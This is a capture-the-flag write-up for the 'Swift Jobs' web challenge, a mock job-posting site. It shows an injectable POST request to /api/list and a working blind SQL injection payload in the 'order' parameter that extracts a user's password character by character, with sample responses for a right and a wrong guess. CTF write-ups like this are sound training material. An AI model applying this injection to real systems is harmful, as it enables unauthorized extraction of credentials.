# Swift Jobs

## CHALLENGE INFO

You have been tasked with a pentesting engagement on a job posting platform. They've provided you with a mockup build of the website, see if you can find a way to disclose any sensitive information.

## Challange download and instructions

[web_swift_jobs](web_swift_jobs.zip)

To run challange you need some linux with docker

- unzip file
- run ./build-docker.sh

## Solve

<details>
<summary>Click this to collapse/fold.</summary>

sql injectable request:

```
POST /api/list HTTP/1.1
Host: 206.189.18.74:32299
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 23

{"order":"salary DESC"}
```

working sql inject prototype:

`order":"(CASE WHEN (SELECT SUBSTRING(password, 1, 1) FROM users where username = 'flagholder')='H' THEN date ELSE id END) ASC`

correct result begining:

```json
[{"id":5,"title":"Content Engineer","salary":3000,"location":"San Antonio","type":"Remote","date":"2021-08-07"},{"id":7,"title":"Sales Executive","salary":2000,"location":"Arlington","type":"Full Time","date":"2021-08-13"},{"id":8,"title":"Community Manager","salary":2700,"location":"Texas City","type":"Remote","date":"2021-08-27"},
```

incorrect result begining:

```json
[{"id":1,"title":"Graphic Designer","salary":2000,"location":"Houston","type":"Freelance","date":"2021-09-15"},{"id":2,"title":"Project Manager","salary":4000,"location":"Dallas","type":"Contract","date":"2021-09-10"},{"id":3,"title":"Product Designer","salary":3000,"location":"Austin","type":"Full Time","date":"2021-09-03"},
```

[solve.py](solve.py)

</details>

## Flag
